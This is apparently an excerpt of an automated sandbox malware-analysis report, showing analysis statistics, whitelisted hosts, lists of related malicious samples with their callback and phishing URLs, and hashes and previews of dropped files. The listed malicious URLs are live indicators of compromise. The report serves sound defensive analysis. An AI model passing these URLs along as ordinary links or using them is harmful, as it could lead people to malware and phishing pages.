                      HDC Information:
                      • Successful, ratio: 6.6% (good quality ratio 6%)
                      • Quality average: 66.8%
                      • Quality standard deviation: 27.8%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 251
                      • Number of non-executed functions: 63
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, wermgr.exe, backgroundTaskHost.exe, MusNotificationUx.exe, UsoClient.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, mobsync.exe
                      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 205.185.216.10, 205.185.216.42, 51.103.5.159, 168.61.161.212, 204.79.197.200, 13.107.21.200, 51.104.139.180
                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, arc.msn.com.nsatc.net, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, cds.d2s7q6s2.hwcdn.net, wns.notify.windows.com.akadns.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, a-0001.a-afdentry.net.trafficmanager.net, emea1.notify.windows.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                      • Execution Graph export aborted for target SearchUI.exe, PID 6804 because there are no executed function
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Signature Similarity

                      Sample Distance (10 = nearest)
                      10 9 8 7 6 5 4 3 2 1
                      Samplename Analysis ID SHA256 Similarity

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      10:33:44API Interceptor571x Sleep call for process: explorer.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      34.102.136.180Nuevo pedido.exeGet hashmaliciousBrowse
                      • www.villacliviapuntacana.com/heye/?jL30vv=QG02RUNsa0LhiZL288uNyx++CfLyg7Z1THsSbrt32so9vJnZTzwIUTmopGqFwa9SSNMC&p0G=jHKTOF1xN
                      SecuriteInfo.com.Variant.Razy.820883.21352.exeGet hashmaliciousBrowse
                      • www.earthsflavour.com/onga/?Jt7=XVI4nVZP&DFNDr=RGRiN4r6eqIMqNbEK/0HTu8Wd0NYYkENYvuuha6+nlpguEG9/kN5ITxWbCKzfpqlpRFI
                      Nuevo pedido.exeGet hashmaliciousBrowse
                      • www.lacrr.com/heye/?D4f8=GFQnpj4pCO4iYlP05Hgk8QUCYAfzued70SqtlWYIs8y3Vsj/B2JRdADq6wh4jdyRU7fN&uDHX=NrThkj
                      Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                      • www.innov-learners.com/nu8e/?DVldV=QevFEwbAL4p08A6T5MxY8eQLsVaONsckSdfIEh+Wp6NlCD6blj5iX/tcrVOoPz32ujRE5+I0EA==&lnPd=Txlhkdd
                      New Purchase Order NoI-701-PDF.exeGet hashmaliciousBrowse
                      • www.northatlanticfutsal.com/onga/?1btDy44=pxoBipZyRlvB2Nir6m3qwCmzUENgQpxMtzjDzlwsqSBU4HKJyP9IxAvK1EtUvK7niK4O6/xXiA==&uN6L=fdfLu6i8
                      December SOA.exeGet hashmaliciousBrowse
                      • www.2024project.com/m98/
                      Copy111.exeGet hashmaliciousBrowse
                      • www.comedynationlive.com/t052/?YN9D1t0H=JmuyJyz+Zav0m8lRdxHxQPvUoKJ6IE4gMbmFr6e09Sk8gMVmMPiKXJ3XVHcVCKNQMEZA&Cjs0=ctxXUZJH2VX4Wt1
                      REQ670091261.exeGet hashmaliciousBrowse
                      • www.glamatomy.com/krc/?NtNtOJ=wXL4zzA8bjMDp&Jtv4=5H9sLn/wijSvyyrXQKpBoxWtRefaTOE3+Ra1BebDsPFqHjTtlZLS7lnyHIvoSJnpPpiUjSIsmg==
                      SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                      • www.thegrace360.com/th7/?-ZeTi6B=8pl9HEK+zoYSNKDF2CDh05msanbgfpHbDvzQ4MEbi+i+GH1bSuRGlWah590pdLiLbHqW&2dc=lnxh
                      yeni sipari#U015f pdf.exeGet hashmaliciousBrowse
                      • www.unbelievabowboutique.com/n7ak/
                      dhl.exeGet hashmaliciousBrowse
                      • www.agencybuilderforum.com/s9zh/?bv=YTChiRNhgdrDNBD0&1bzHjh0=RZS8C4rTTGO3Zf8fLHhYdDir2vlpYdmGbCx3Oy4n7vcFpSYIo+VVlvSdn28GZg2MMdav
                      2021 Additional Agreement.exeGet hashmaliciousBrowse
                      • www.rizrvd.com/bw82/?NjNl72=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikDD1Pm8JIK5DnIp/mA==&Yn=fbdDwrOx0RedB
                      image003(12-29-15-39-43).exeGet hashmaliciousBrowse
                      • www.magandaconfections.com/6bu2/?oH5d=VTCliXUPe27LX27&iB=rHiPtjAKXmZAiMFsFAd8WM0Y7ja7xsHZYRaJ3oHwcNREyepAK7CR6Sgkt2kaT/nTFhQC
                      DEBIT NOTE_INA101970.exeGet hashmaliciousBrowse
                      • www.bestgiftforu.com/6bu2/?BZ=MWnj9d2scsTA8qNIjL4BvEbAFdlLK6xEpCuv7tc+0i1FrmBrUhT8iYp+2wxY/+44gjei&o8rLu=yVMpLRLxgxDtgBb
                      payment copy.exeGet hashmaliciousBrowse
                      • www.alchemdiagnostics.com/s9zh/?KXfDz=BxHvwtdyFJ7g92C4A5CuAB0OHS50ujic6t3+DR/Y4zUr9N/SujKusNJSI950bZ2Uv6q/qndagQ==&Dzrpc=ZZL0mpThqt
                      Purchase order pdf.exeGet hashmaliciousBrowse
                      • www.lisemonline.net/nwc9/?LX9p=TwF2YpaQnX/5GYmGe1UkSmm46xgr1dpkGy1a0+JEnLDdT5PJJn/q94zblO2NEp8DQYic&MnZ=GXLtz
                      TN22020000560175.exeGet hashmaliciousBrowse
                      • www.valiantbranch.com/0wdn/?MR4ta=s8dtF+pU9XgLvAj+YMupaJ1Eoyvn9WgtzGfCwRMFaoNSq/qxloQqhfrf7/fO0kNzyMzB&Vnt4B=-Zd0izgp5Bkt8FY
                      Rfq_Catalog.exeGet hashmaliciousBrowse
                      • www.kenoshariot.com/nu8e/?oN9=3suiwbFFwD4jKOgFE7GvlPCOmz0ZA6TrRofmICZVYKXh11FC/nZV64uvFAZ/K3U1MZ3M&jL30vv=WZ90ExkHF0JPK
                      P.O-45.exeGet hashmaliciousBrowse
                      • www.empireplumbingandheating.com/s9zh/?RHR=oT0NYVkogC0z2SAthoaLoXNHp+LhJn8LSVunJ+2mR2NZOMMFNtyVp4W6SGtGTx/pc4h2&3f=YnOlnZfXtJb
                      SHIPPING DOCUMENTS_pdf.exeGet hashmaliciousBrowse
                      • www.bombpoppa.com/hsw/?8pw02bCh=OptI/gAIac+N0im2r7v8IDDJivi+tRgBzpNa8Yb7yT3xcmkJ49YvtS8E43B032sf2VTG&n4=iL30VRvpX

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      GOOGLEUSNuevo pedido.exeGet hashmaliciousBrowse
                      • 34.102.136.180
                      05.01.2021_Bel31.docxGet hashmaliciousBrowse
                      • 216.239.36.21
                      05.01.2021_Bel31.docxGet hashmaliciousBrowse
                      • 216.239.34.21
                      svchost.exeGet hashmaliciousBrowse
                      • 35.193.1.156
                      https://veringer.com/wp-includes/wwii11/GXQb6HLGz4AV965RfN9795cyETWfmdzBUarzFg4YkqaJnfdTD/Get hashmaliciousBrowse
                      • 172.217.168.34
                      575h4N5kNl.apkGet hashmaliciousBrowse
                      • 216.58.215.234
                      https://da930.infusion-links.com/api/v1/click/5782635710906368/4861645707411456Get hashmaliciousBrowse
                      • 172.217.168.83
                      https://micrrosoftonline13392123112a.typeform.com/to/y7uCHr2NGet hashmaliciousBrowse
                      • 172.217.168.34
                      zoom-us-zoom.apkGet hashmaliciousBrowse
                      • 216.239.35.12
                      zoom-us-zoom.apkGet hashmaliciousBrowse
                      • 216.239.35.4
                      http://encryptdrive.booogle.netGet hashmaliciousBrowse
                      • 35.241.11.240
                      http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20=Get hashmaliciousBrowse
                      • 216.58.215.227
                      https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2020-11-05T09:00:54.888-07:00&mkt_tok=eyJpIjoiWmpKbVlUTXpPRGMzTTJRMSIsInQiOiJtMm9iYWJESHd5VldFUTF2a05zeEdtVUdMNms3cHVcL01OcW9hYUlwOElYZFwvNkdvd0UzV0x2SDdNZVlIMWFTSG1jS28zM0JIamh3YXRvcmU0K2htaTJpTlFLbjNNaWswT2NxYlhXdElEZHVzMlFaclpoTUFzZk1ibTV0SGVwSCs2In0%3DGet hashmaliciousBrowse
                      • 216.58.215.227
                      SecuriteInfo.com.Variant.Razy.820883.21352.exeGet hashmaliciousBrowse
                      • 34.102.136.180
                      Nuevo pedido.exeGet hashmaliciousBrowse
                      • 34.102.136.180
                      Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                      • 172.217.168.83
                      http://bubbawatsongolf.com/_ARCHIVE/1kkkKgOZ0fekTnDr9Y221yQmAabJ8I5yGEFlTawlU5OuJtZyYlUmm9/Get hashmaliciousBrowse
                      • 216.58.215.225
                      New Purchase Order NoI-701-PDF.exeGet hashmaliciousBrowse
                      • 34.102.136.180
                      https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                      • 35.205.113.186
                      https://austalusa.mightymenofdavid.org/787423?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&&mic#8487?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&7523891&7523891&7523891&7523891Get hashmaliciousBrowse
                      • 216.58.215.225
                      NAMECHEAP-NETUSadditional items.xlsxGet hashmaliciousBrowse
                      • 199.193.7.228
                      https://encrypt.idnmazate.org/Get hashmaliciousBrowse
                      • 198.54.116.212
                      New paper work document attached.exeGet hashmaliciousBrowse
                      • 198.54.122.60
                      Shipping Details DHL.xlsGet hashmaliciousBrowse
                      • 199.188.205.60
                      DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                      • 198.54.122.60
                      Shipping Details DHL.xlsGet hashmaliciousBrowse
                      • 199.188.205.60
                      SecuriteInfo.com.Generic.mg.5d1df2995bd1b54b.exeGet hashmaliciousBrowse
                      • 68.65.123.231
                      lygDLQ1LJk.exeGet hashmaliciousBrowse
                      • 198.54.114.217
                      SecuriteInfo.com.Variant.Razy.821052.23809.exeGet hashmaliciousBrowse
                      • 162.0.235.23
                      AwEVnix10f.exeGet hashmaliciousBrowse
                      • 198.54.114.217
                      rib.exeGet hashmaliciousBrowse
                      • 198.54.117.200
                      New order for machines.docGet hashmaliciousBrowse
                      • 162.0.235.23
                      #20030300COPY.htmGet hashmaliciousBrowse
                      • 198.54.115.249
                      January Purchase Order.exeGet hashmaliciousBrowse
                      • 199.188.200.150
                      payment copy.exeGet hashmaliciousBrowse
                      • 198.54.116.96
                      https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1Get hashmaliciousBrowse
                      • 198.54.116.212
                      SecuriteInfo.com.Artemis28F2575135C0.exeGet hashmaliciousBrowse
                      • 198.54.114.217
                      GPS_Supplier Invitation.xlsmGet hashmaliciousBrowse
                      • 198.54.115.224
                      Rfq_Catalog.exeGet hashmaliciousBrowse
                      • 198.54.117.211
                      Proforma Invoice.exeGet hashmaliciousBrowse
                      • 162.0.232.137
                      UNIFIEDLAYER-AS-1USTcfiudMzzw.exeGet hashmaliciousBrowse
                      • 192.254.250.49
                      SecuriteInfo.com.Variant.Razy.820883.21352.exeGet hashmaliciousBrowse
                      • 162.214.103.133
                      https://needaboatmoved.com/01-04-2021.htmlGet hashmaliciousBrowse
                      • 192.185.153.238
                      https://punbi.com/tec/YW1AaGhzLmdvdg==Get hashmaliciousBrowse
                      • 162.214.104.108
                      New Purchase Order NoI-701-PDF.exeGet hashmaliciousBrowse
                      • 108.167.141.199
                      W12Y3fjxTI.exeGet hashmaliciousBrowse
                      • 108.167.189.13
                      https://punbi.com/tec/YWFyb24uZnJpb3RAY29tbXVuaXR5YmFua25hLmNvbQ==Get hashmaliciousBrowse
                      • 162.214.104.108
                      https://nicegroupofcompanies.com/dfjkukfyh/sfftdrscrrhvh/ddhfycchch.php?email=test@test.comGet hashmaliciousBrowse
                      • 192.185.117.234
                      QUOTATION REQUEST.exeGet hashmaliciousBrowse
                      • 74.220.199.6
                      2021 Additional Agreement.exeGet hashmaliciousBrowse
                      • 108.167.156.42
                      lKRxa2Vb4W.exeGet hashmaliciousBrowse
                      • 162.241.225.237
                      Purchase order pdf.exeGet hashmaliciousBrowse
                      • 192.185.5.50
                      Document_320921592.xlsmGet hashmaliciousBrowse
                      • 192.185.129.133
                      Rfq_Catalog.exeGet hashmaliciousBrowse
                      • 74.220.199.6
                      http://perfumeriarecuerdame.cl/overillustration/lTqyZy8AT7ByAidoAEArFkYch5nVjGFftnZdnv8yqAaPMnENN7URxUqiCu/Get hashmaliciousBrowse
                      • 50.116.111.59
                      https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                      • 50.116.111.59
                      https://tessiersinc.bendblue.ga/YnJlbnQuYmVja2VyQHRlc3NpZXJzaW5jLmNvbQ==Get hashmaliciousBrowse
                      • 162.241.67.201
                      adjunto 86028707-97299.docGet hashmaliciousBrowse
                      • 50.116.111.59
                      DOCUMENTO_MEDICO 047.docGet hashmaliciousBrowse
                      • 50.116.111.59
                      https://hospitaldeguimaraes.blurmask.ga/YXJtaW5kYW1hY2hhZG9AaG9zcGl0YWxkZWd1aW1hcmFlcy5taW4tc2F1ZGUucHQ=Get hashmaliciousBrowse
                      • 162.241.67.201

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_70877588966c9e9114ebf3f0598991a0ff84_15123ce1_166a2352\Report.wer
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):32720
                      Entropy (8bit):3.6782015835373576
                      Encrypted:false
                      SSDEEP:384:qNjAhz9wb0F6Trj3KXxooRaOX7VE/OXu7Fqh4ltna:qNQz9wwF6Trj3Cx7aOX7V1Xu7Fqh4lta
                      MD5:0823B3F93983C0458D4F2E43F91546E3
                      SHA1:602F36D7727C30C2D525ECB5DFC8C6F364FB16B3
                      SHA-256:BB5845148AA087B32579077ABE1D68EB366047A1BF67C84D15912289B2C2304D
                      SHA-512:4B42D7C396CC79A1B33D0E2E9CED1EDD92E5C05593D2A6C4578EA5741ADDD84953AB8B08B24E9A17C7EF640D26D41F4F204F91C5654445887270B6445990A8C3
                      Malicious:false
                      Reputation:low
                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.3.1.2.8.1.4.0.3.7.2.3.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.3.1.5.c.1.2.-.5.9.7.f.-.4.4.8.2.-.a.e.b.0.-.d.7.2.7.2.9.c.b.9.9.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.e.b.e.d.9.8.-.9.5.2.a.-.4.1.d.b.-.b.6.5.b.-.8.6.f.4.e.1.5.a.a.8.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.7.8.-.0.0.0.1.-.0.0.3.8.-.d.1.0.b.-.6.d.8.b.3.f.e.3.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.e.b.9.d.6.f.8.f.4.4.4.8.c.b.1.f.d.6.4.7.8.1.8.9.e.d.e.b.e.3.d.7.0.4.7.7.e.a.7.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.9.2././.0.3././.2.1.:.1.4.:.3.
                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FC9.tmp.WERInternalMetadata.xml
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):10848
                      Entropy (8bit):3.7029922346526734
                      Encrypted:false
                      SSDEEP:192:R3l7DfNifsZl6YK/5Bfgmfq4Z79QYpDRJ89bbcVPXqBfnixpm:R3l3NiUZl6YaPfgmfq4Z79ZmbmPXqBfz
                      MD5:451059AC5DB46DF5A697AF0E4F2AE1BE
                      SHA1:0A6E4AA0A90BF8486BF2DD419FE5A281A5527F1F
                      SHA-256:ECB3287D7FC89862700D848EEB9C438D1BAE3D465002B3686877E2F037E2EC9C
                      SHA-512:2A0B6AF986FC62436AA3CFC2C00823B9AB18DCF11A9F0B8EA1F0F270C675A11157E476FAFDFD7E050E4C9BECE8F72551643A1AEA4ADD3D27FA1A35F7D7BFDE88
                      Malicious:false
                      Reputation:low
                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.7.6.3.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.7.6.3...9.7.3...a.m.d.6.4.f.r.e...r.s.5._.r.e.l.e.a.s.e...1.8.0.9.1.4.-.1.4.3.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.9.7.3.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.7.2.<./.P.i.d.
                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2095.tmp.xml
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4763
                      Entropy (8bit):4.528305605662854
                      Encrypted:false
                      SSDEEP:48:cvIwGE8zsi/mDI94IMWv81w9uRt4RPm8M4JXYQOFZUyq85tQ8yw91wMA+d:uIsfilEkuuJIQOUmQbwAMA+d
                      MD5:580F321FFC0D9A5CF971930F0D693B98
                      SHA1:1177257C092682BA4E176CCC4DA086D11B21BF5F
                      SHA-256:C81EF1BCDD9EBE7A297AB38C11318FABCB56CE46BA7F4C893ED23F9935999785
                      SHA-512:F2D806C7E2E960572EE875BE6D9DF66E57949D9E0C9B2F27429AFA9D2FB8F14FF32C9FA25B3384483C792906211871594B080E1319B35CD129A7222C11D222A4
                      Malicious:false
                      Reputation:low
                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17763" />.. <arg nm="vercsdbld" val="973" />.. <arg nm="verqfe" val="973" />.. <arg nm="csdbld" val="973" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="579903" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.973.17763.0-11.0.170" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="3965" /
                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4.tmp.dmp
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Tue Jan 5 09:33:40 2021, 0x1205a4 type
                      Category:dropped
                      Size (bytes):737704
                      Entropy (8bit):1.364695721839178
                      Encrypted:false
                      SSDEEP:1536:fxwushh96VaWG2TsMqJlG2sIobcqNyKMIvvtvdt4N0:fxKhhKTM1sBgMMAltj
                      MD5:3D4BF86079B5ADD1F5F9A088100D5A69
                      SHA1:BCC14FC0CD359D030B6D0CA032A72654BF966721
                      SHA-256:BF5CA3D03D3DFCA142D75FC7E66A0E0A168003FEDAB729172F45E781F973999E
                      SHA-512:05A6DCF119749EEB5D11169090276BBD69B20C901DBEF40D3360D8F032F299FA280C924EA7CEC01F3613E48F5A0A3E2749C4062D56484BEDC33004DF4EB206BB
                      Malicious:false
                      Reputation:low
                      Preview: MDMP..c..... .......t2._..............................cE.......u......Lw......................T.......x....'._............3...+............0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.7.6.3...1...a.m.d.6.4.f.r.e...r.s.5._.r.e.l.e.a.s.e...1.8.0.9.1.4.-.1.4.3.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.7.6.3...1.......................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\1DLLHrh5gD2BxyZsLN2_FxFV-Gc.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines
                      Category:dropped
                      Size (bytes):121602
                      Entropy (8bit):5.370178867506393
                      Encrypted:false
                      SSDEEP:3072:wKXX4GkTzrQcDhJYoGWvDRBaLr9FlKFV8fUkFUkZ86E:wKuLvEFOiz8j
                      MD5:D31109A1A8607913AB74DF4745E41B60
                      SHA1:DECEDCF25FDCD96AFBFBCC08924E29C0C5C12F78
                      SHA-256:6390CC8F2AF2FC748F4EEE4927C2D68B0271938F2AF31B6D039C575B044E7D6D
                      SHA-512:0C0911B5106A13BD0A1DAF173F1CE9E319522A75C104D7EFF73BCC14BA281ECB742502A047836A232E368828C9ECE0E67E7DA944F3C14268F12513003B2954AC
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: /*! Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. */.var WinJS_Init=function(n,t){var i=typeof n!="undefined"?n:typeof t!="undefined"?t:typeof global!="undefined"?global:{};(function(n){typeof define=="function"&&define.amd?define([],n):(i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StartTM"),typeof exports=="object"&&typeof exports.nodeName!="string"?n():n(i.WinJS),i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StopTM"))})(function(){var u,r;return function(){"use strict";function t(n,t){n=n||"";var i=n.split("/");return i.pop(),t.map(function(n){if(n[0]==="."){var r=n.split("/"),t=i.slice(0);return r.forEach(function(n){n===".."?t.pop():n!=="."&&t.push(n)}),t.join("/")}return n})}function f(r,f,e){return r.map(function(r){if(r==="exports")return e;if(r==="require")return function(n,i){u(t(f,n),i)};var o=n[r];if(!o)throw new Error("Undefined dependency: "+r);return o
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\9Ht61b9IFYipu38R0kp97M9KSo8.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):46010
                      Entropy (8bit):5.543964838040099
                      Encrypted:false
                      SSDEEP:768:eaCiT8vz9VV4xhSXkyrqRxu/DuMYdt71Nr9p1NXoT/V:APz9n4xhSXkyrq/cDuMYd7NXc
                      MD5:9108372127C60AD398F4E22BD33E3A56
                      SHA1:FC83C8AF5B20C2708A8B3A3527D9982394B70291
                      SHA-256:CBA915C9608AA434CCC6D7974DF26C65C72C4C0AB2AD980D17898D7CCECDD576
                      SHA-512:1F55A2D47956305AB7B0B29A77A8C8D8A072EDD5AAAAC7B975CD3AB67B93ECF8E5C0F0B1F2E55FCB3C993845590077984640C78D83D3D8F39F2B9713F75DF897
                      Malicious:false
                      Reputation:low
                      Preview: var WSB;(function(n){function h(n){return n.toLocaleLowerCase().replace(l,"").trim()}function e(n,t,i,r,u){if(!n)return i;if(typeof n!="string")try{return{content:URL.createObjectURL(n),type:0,bgColor:r}}catch(f){return SharedLogHelper.LogError("convertToHtmlImage "+t,u,f),i}else return{content:n,type:0,bgColor:r}}var c="data:img/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAR4UlEQVR4nMVbe4wd5XX/nW/m7nr9XNtpMSqpAZOShLbQ8gpgIFHU/EOSmiJASaWqqqmCUpqakMoxCKEopXbVQoiEqigyJFFaEVInMcSkokqa3YQIh9CAIAZMvH6AIfiBd+193cfMd6pzvsfM3Hv3Za/Jt5qd973f+Z1zfucxc4mZcTrHRT95cwPA6xj2fMAuY7J9gHynLBagYk1kZTsjsmMEux/A/sRk33r28ksfPV1TnHcALh58ezXD3s2w1zHsqiAge6EZeUloiwiG3xYQyK/lmJF9skzIDyVJ9gSR/eLTf3rtgfma77wBcMng8Q2AvY1h17AKbMFRQL8vwuu3OkAoAFECQPaJisUBINfmMCaHoQzG2CFD+YM/vfDPHjjVeZ8yAJcOnhATv4fB/U7DNi6iaV0jrxwL11UFd0IShe1i3+jaIk1aCgApEBbGZJOGsi//7wV/vukdB+CywfHVAP9INO4ECkI5TTMhah5toBTHg/kHSwjaLtZyPjEOAGNaCoazhNwBYjLZHjEm/8KT5980Z4s4KQAuH5zYDPBGVjHZ+7fVvwCA0z6XTF9cojD5CgDeEqjMAwUpismrxhMBwAufmKazDiPbm
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\AjtDo5CuCwKn9Z68f3Ya5AF5dIM[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
